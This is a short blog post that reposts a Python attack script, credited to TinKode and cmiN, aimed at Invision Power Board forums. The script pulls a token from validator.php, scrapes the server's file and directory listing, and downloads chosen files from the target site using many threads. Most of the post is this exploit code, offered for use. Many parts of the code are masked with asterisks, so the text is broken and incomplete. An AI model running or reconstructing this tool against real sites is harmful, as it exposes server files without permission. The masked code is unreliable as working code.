Sunday, February 5, 2012

TinKode-IPB Full Disclosure Exploit [Python]


IPB Full Disclosure Exploit [Python]

Posted by isrtinkode on February 19, 2010
#! /usr/bin/env python3.1

################################################################
#           _____ _____  ____  (validator.php)            #
#         |_   _|  __ \|  _ \                            #
#    | | | |__) | |_) |                           #
#     | | |  ___/|  _ <                            #
#     _| |_| |    | |_) |                           #
#     |_____|_|    |____/                            #
#                                   @expl0it...                #
################################################################
#          [ IPB Files / Directories Full Disclosure ]         #
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   #
#           [ Greetz: insecurity.ro, darkc0de.com ]            #
################################################################
#                                                              #
#                 Special thanks for: cmiN                     #
#                 www.TinKode.BayWords.com                     #
################################################################
#! /usr/bin/env python3.1 
 
################################################################ 
#           _____ _____  ____  (validator.php)            # 
#         |_   _|  __ \|  _ \                            # 
#    | | | |__) | |_) |                           # 
#     | | |  ___/|  _ <                            # 
#     _| |_| |    | |_) |                           # 
#     |_____|_|    |____/                            # 
#                                   @expl0it...                # 
################################################################ 
#          [ IPB Files / Directories Full Disclosure ]         # 
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   # 
#           [ Greetz: insecurity.ro, darkc0de.com ]            # 
################################################################ 
#                                                              # 
#                 Special thanks for: cmiN                     # 
#                 www.TinKode.BayWords.com                     # 
################################################################ 
 
 
import os, sys, urllib.request, urllib.parse, threading 
 
 
def main(): 
    logo = """ 
\t |---------------------------------------------------------------| 
\t |                      _____ _____  ____    (TM)                | 
\t |                     |_   _|  __ \|  _ \                       | 
\t |                       | | | |__) | |_) |                      | 
\t |                       | | |  ___/|  _ <                       | 
\t |                      _| |_| |    | |_) |                      | 
\t |                     |_____|_|    |____/                       | 
\t |                                                               | 
\t |                                                               | 
\t |                  IPB Full Disclosure expl0it                  | 
\t |                      Written by cmiN                          | 
\t |              Vulnerability discovered by TinKode              | 
\t |                                                               | 
\t |                                                               | 
\t |         Visit: www.insecurity.ro & www.darkc0de.com           | 
\t |---------------------------------------------------------------| 
""" 
    usage = """ 
         |---------------------------------------------------------------| 
         |Usage:  ipbfd.py scan http://www.site.com/IPB_folder           | 
         |        ipbfd.py download *.zip -> all                         | 
         |        ipbfd.py download name.jpg -> one                      | 
         |---------------------------------------------------------------|""" 
    if sys.platform in ("linux", "linux2"): 
        clearing = "clear" 
    else: 
        clearing = "cls" 
    os.system(clearing) 
    print(logo) 
    args = sys.argv 
    if len(********) == 3: 
        try: 
            print("Please wait...") 
            if args[1] == "********": 
                extract_parse_save(********)) 
            elif args[1] == "********": 
                download_data(********]) 
        except Exception as message: 
            print("An error occurred: ********)) 
        except: 
            print("Unknown error.") 
        else: 
            print(********") 
    else: 
        print(usage) 
    input() 
 
 
def extract_parse_save(url): 
    print("[+]Extracting content...") 
    hurl = url + "/validator.php" 
    with ********.********) as usock: 
        source = usock.read().decode() 
    print("[+]Finding token...") 
    word = "validate('" 
    index = source.find(word) 
    if index != -1: 
        source = source[********):] 
        value = source[:source.index(********)] 
        hurl = url ********.format(********) 
    else: 
        print("[!]Token not found.") 
    print("[+]********...") 
    with urllib.request.******** as usock: 
        lastk, lastv = None, None 
        dictionary = dict() 
        for line in usock: 
            line = line.decode() 
            index = line.find(********) 
            if index != -1: 
                lastk = line[index + ********" ").strip(********) 
            index = line.find(********") 
            if index != -1: 
                lastv = line[index + ********:line.index("********")].********(" ") 
            if lastk != None and lastv != None: 
                index = ********") 
                if index in (********, 0): 
                    lastk = "[other] {}".format(lastk) 
                else: 
                    lastk = "[********}".format(********) 
                dictionary[********astv 
                ******** = None, None 
    print("[+]Organizing and saving paths...") 
    with open("********", "********") as fout: 
        fout.write(********) 
        keys = sorted(********) 
        for key in keys: 
            fout.write(********)) 
 
 
def download_data(files): 
    print("[+]Searching ********...") 
    mthreads = ******** 
    with open(********) as fin: 
        url = fin.readline()********) 
        if files.find("*") == -1: 
            hurl = ********) 
            Download(hurl).start() 
        else: 
            ext = files[files.********] 
            for line in fin: 
                pieces = l********) 
                if pieces[0].count(ext) == 1: 
                    upath = pieces[1] 
                    hurl = ********) 
                    while threading.active********reads: 
                        pass 
                    Download(********) 
    while threading.active_count(******** 
        pass 
 
 
class Download(********): 
 
    def __********): 
        threading.Thread.********) 
        ******** = url 
 
    def run(self): 
        try: 
            with urllib.request.urlopen(********usock: 
                data = ********) 
                uparser = urllib.parse.urlparse(********) 
                pieces = uparser.********) 
                ******** = pieces[********] 
                with open(********) as fout: 
                    fout.********) 
        except: 
            pass 
 
 
********__main__": 
    main()


You must have python 3.1 to work!

0 comentarii:

Post a Comment